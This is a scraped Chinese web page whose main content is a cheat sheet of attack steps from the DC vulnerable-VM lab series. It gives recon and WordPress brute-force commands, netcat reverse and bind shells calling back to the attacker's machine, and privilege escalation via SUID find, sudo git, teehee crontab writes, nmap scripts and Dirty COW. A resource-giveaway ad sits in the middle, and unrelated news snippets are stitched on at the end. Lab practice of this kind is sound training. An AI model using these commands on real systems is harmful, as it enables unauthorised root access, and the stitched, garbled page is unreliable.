范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文

DC系列靶机知识点总结

  常用命令和工具:
  metasploit nmap sqlmap 中国蚁剑 冰蝎 dirsearch dirbuster 等常用工具就不在此介绍了 nmap 192.168.26.0/24
  nmap -sS -sV -T4 -A -p- 192.168.26.129
  whatweb是kali自带的一个信息搜集工具
  whatweb http://dc-2 #常用于信息搜集,获取cms和服务器版本等信息
  数据库密码hash解密工具john
  john password.txt #文件里是hash加密后的密码
  cewl是kali自带的一个密码字典生成工具
  cewl -w dc_passwords.txt http://dc-2 #按照一定规则,对网站爬取生成密码字典并写入到dc_passwords.txt中
  针对wordpress站点可以使用wpscan先爆破该网站的用户名
  wpscan --ignore-main-redirect --url 192.168.26.130 --enumerate u --force
  通过已经wpscan扫描到的用户名和cewl生成的密码字典可以对目标进行爆破登录
  wpscan --ignore-main-redirect --url 192.168.26.130 -U dc-_user.txt -P dc_passwords.txt --force
  漏洞搜索:
  searchsploit joomla 3.7.0 #搜索joomla 3.7.0的漏洞
  msfconsole #利用msf搜索相关组件漏洞
  search joomla 3.7.0
  python交互式shell
  python -c ‘import pty;pty.spawn("/bin/bash")’ #使用python获取交互式shell,实际上也就是模拟了一个虚拟终端
  RCE反弹shell的命令:
  nc -lvnp 666 #kali先监听666端口
  nc 192.168.26.132 666 -e /bin/bash #在靶机上执行该命令,ip为kali的IP
  SSH服务相关命令 开启:/etc/init.d/ssh start
  重启:/etc/init.d/ssh restart
  关闭:/etc/init.d/ssh stop
  状态:/etc/init.d/ssh status
  ssh graham@192.168.26.134 # @符前为用户名 后面为要登录的服务器IP
  目标机器连接kali利用ssh将 exp下载到靶机上来
  scp >root@192.168.26.20:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/ #靶机上执行 用户名和IP是kali的
  scp /path/local_filename username@IP:/path #kali上执行 用户名和IP是靶机的
  涉及到的提权方式:
  **Tips:**拿到一个本地普通用户后,往往先要在该用户的家目录下搜索一番,以寻找有用的信息,提权的时候几乎所有的文件操作都在tmp目录下,因为其他目录往往没有权限,所以要时刻注意自己当前所在的目录。
  find / -user root -perm -4000 -print 2>/dev/null #发现具有suid权限的命令
  suid之find提权
  touch test
  find test -exec whoami ;
  find te -exec netcat -lvp 5556 -e /bin/sh ; //在被攻击服务器上执行>>该命令 监听本地5555端口,用于入站连接
  netcat xx.xx.xx.xx 5556 // 自己服务器上 使用>nc 输入对方ip和端口,去连接,从而获得一个root权限的shell
  sudo提权系列:
  sudo -l #查看可以无密码使用root权限的命令
  sudo之git提权
  输入以下命令即可提权成功
  sudo git help config
  h
  !/bin/bash
  sudo之teehee提权(方法不唯一)
  teehee命令可以对文件进行写入操作,我们可以借此来提权
  利用写入定时任务来提权
  echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab # 参数 -a,对指定文件进行追加,不覆盖
  上面这条命令的意思是在/etc/crontab下写入定时计划,一分钟后由root用户给 /bin/bash 命令加权限(chmod 4777即开启suid和rwx权限),这样当我们再执行/bin/bash的时候就可以获得一个root权限的shell。除此之外还可以利用写入/etc/passwd文件添加一个有root权限的用户来提权。
  sudo之nmap提权
  我们使用 sudo -l命令发现我们可以不用密码就能以root权限运行nmap
  然后我们可以利用nmap来提权
  echo ‘os.execute("/bin/bash")’ > shell #写一个脚本,调用系统命令执行/bin/bash
  sudo nmap --script=shell
  由于我们可以以root权限 运行nmap,然后我们让nmap去执行这个shell脚本,从而获取到一个root权限的shell。
  【一>所有资源关注我,私信回复"资料"获取<一】
  1、网络安全学习路线
  2、电子书籍(白帽子)
  3、安全大厂内部视频
  4、100份src文档
  5、常见安全面试题
  6、ctf大赛经典题目解析
  7、全套工具包
  8、应急响应笔记
  脏牛提权 upload /root/dcow.cpp 192.168.26.128 /tmp #上传exp到靶机的 /tmp目录下
  shell
  python -c ‘import pty;pty.spawn("/bin/bash")’ #优化终端界面,便于操作
  cd /tmp
  chmod +x dcow.cpp
  g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
  ##########################################
  -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,->O3优化级别最高
  -std=c++11就是用按C++2011标准来编译的
  -pthread 在Linux中要用到多线程时,需要链接pthread库
  -o dcow gcc生成的目标文件,名字为dcow
  ##########################################
  ./dcow #执行
  第三方特定版本插件提权
  screen4.5.0、exim 4等
  定时任务提权:
  如果定时任务是以root权限运行的,并且低权限用户可以修改定时任务的脚本,那么可以尝试追加或者改写定时任务的脚本来提权,例如在脚本后面追加一行反弹shell的命令来获取到root权限。
  其他知识点:逃逸出rbash的一些方法

大数据之HIVE入门(三)安装hadoop用root账号建立一个软件安装目录。mkdirpappchowncloud。cloudapp将已下载好的hadoop安装包等通过putty套件中的psftp上传到已美国科学家布拉迪,携专利技术前来中国发展,还顺手带来千亿项目美国一向以能吸引全球顶尖人才为傲,然而就有一位美国的科学家布拉迪,反而对美国的发展环境感到不适应,转而携带自己研发的专利技术,到中国发展,没想到,不被美国重视的科学家,此举为中国顺数字人民币普及,腾讯要赢了?支付宝存在感更低了?数字人民币普及,腾讯要赢了?支付宝存在感更低了?随着网络时代的发展,我们的支付体系也发生了巨大的变化,从纸币的延伸到了现在的线上支付,在方便了我们生活的同时,也杜绝了假币的产生,可8H小鞋神烘干除菌智能鞋盒,帮你解决鞋臭湿气残留的痛点2022虎年春节已悄然而去,立春那天冬奥运会也开幕了,可气温依然在几度徘徊,阴冷潮湿,洗干净的衣物鞋子如果不借助烘干设备,自然晾晒好几天依然湿漉漉的,笔者所处的南方更是如此。聊到烘Omicron解剖结构曝光找到飞速传播的原因了撰文凌骏Omicron会是最后一种新冠病毒吗?Omicron毒株可能是人类历史上传播速度最快的病毒,但它似乎仍不满足。目前,其子变体BA。2也有逐渐取代此前流行的OmicronBA小米手机手册001小米手机关机常按开机键,出现选择选关机按钮。002小米手机强制关机同时按开机键音量下,等屏幕黑屏时立即按开机键音量上(可以不放开开机键,放开音量下,换成音量上),进入REC(双对开门冰箱和十字门冰箱,哪一种更好?多方面对比,建议看看冰箱,是每个家庭装修都会新添置的家电之一。然而,市面上的冰箱样式可不少,而且不同的冰箱有不同的容量和开门方式供消费者选择。不少朋友在选购冰箱的时候都特别纠结,不知道该选双对开门冰箱手机号长时间停机,如何不被注销?移动联通和电信停机保号攻略当今社会,随着移动互联网时代的发展,各种短视频的涌入,无论男女老少,几乎人手必备一部智能手机,手机的使用肯定和SIM卡是密不可分的,SIM卡就离不开三大运营商移动电信与联通,但是有localStorage灵魂五问。5M??10M灵魂五问localStorage存储的键值采用什么字符编码5M的单位是什么localStorage键占不占存储空间localStorage的键的数量,对写和读性能的影响写个方法统计华为P50Pocket和iPhone13,建议买哪个?对于这两部手机的定位是完全不同的,价格也悬殊比较大,买华为P50Pocket的价格其实已经可以考虑上手iPhone13Pro甚至ProMAX版本了!毕竟人家是折叠屏手机!这款手机的35岁以下人群是二手电商主力用户受各类促销形式的刺激和影响以及对新产品的热衷,年轻人难免产生需求不匹配或者不那么理性的购物。不过,越来越多的年轻人将闲置的商品交易出去,实现物品的再利用。没必要什么都买新的正成为年
新增体温检测,搭载HarmonyOS,华为WATCH3系列手表可控车北京时间2021年6月2日今日,在华为发布会上,华为WATCH3系列首发亮相。时隔四年,华为重启WATCH系列,倾力打造年度智能手表旗舰,依托华为长续航基因的优势,华为WATCH32599元起,首款鸿蒙手表华为WATCH3正式发布6月2日消息,华为今晚召开了全场景新品发布会,正式发布了新一代智能手表华为WATCH3。基础版售价2599元,Pro版本售价3299元。6月11正式开售。华为WATCH3拥有全新3618电商大促首日开门红机构多主线布局新消费商贸零售股估值及溢价情况资料来源Wind,中国银河证券研究院6月1日,一年一度的618电商大促活动正式开启。经济参考报记者从多家电商平台了解到,截至发稿时,包括数码家电美妆休闲食品高通骁龙888Plus基准测试成绩泄露,频率小幅度提升高通可能正在准备推出更快的骁龙版本,即骁龙888Plus。和原有版本相比,只是略有不同,性能有所提升。据Wccftech报道,近日在Geekbench数据库中出现了骁龙888Plu比亚迪公开无人驾驶列车相关专利,可解决行驶模式切换问题IT之家6月1日消息企查查App显示,6月1日,比亚迪股份有限公司公开无人驾驶列车控制方法及系统,列车监控系统,区域控制器专利,公开号CN112874578A,申请日期为2019年自动泊车在地下车库撞了边上的宾利,谁赔?你还记不记得小时候玩过的遥控车?现在,造车新势力想让停车这件事更方便的同时,也变得更有意思起来。小鹏P7即将迎来XmartOS2。6大版本更新,这两天正在进行新系统的小范围公测。其北京家庭新能源指标拿到了吗?拿到了买什么新能源才合算?5月26日上午1000,北京开始进行新能源指标配置。而这一次新能源指标配置,也是2021年北京市实施家庭摇号新政后的首次新能源指标配置。在今年,北京将发放32520个家庭新能源指标从看见到改变,互联网公益的新解作者丨顾见监制丨阑夕长江商学院的朱睿教授提过一个很有意思的观点公益的突破口在于如何用商业的模式做好公益。在她看来公益不是一腔热血,也不仅仅是一片爱心,而是要解决实际问题。用她的话说完胜理想ONE?岚图FREE将上市,增程式混动该怎么选?目前市场上有很多新能源车型,大都以纯电为主,而目前的相关充换电设施建设还远没有达到完善的程度,纯电动车用户多多少少会有一些里程焦虑。因此,增程式混动车型就是目前一个很好的解决方案,天猫618首日快递下乡单量超1000万全国345城实现半日达来源河南广电映象网映象网讯(记者阮海峰)天猫618大促已于6月1日0点准时开启,据悉,又好又快,送货上门成为今年菜鸟物流关键词。由于菜鸟供应链提前对预售商品进行下沉备货,今年天猫6这个618小米11Pro直降700元,配置如何值得出手吗?在今年的安卓系统中,小米可以说表现不俗。前几天数据显示,小米11系列自发布以来,已经超过了300万销量,成为骁龙888机型的中坚力量。而这几天,小米又一鼓作气,继续提升小米11销量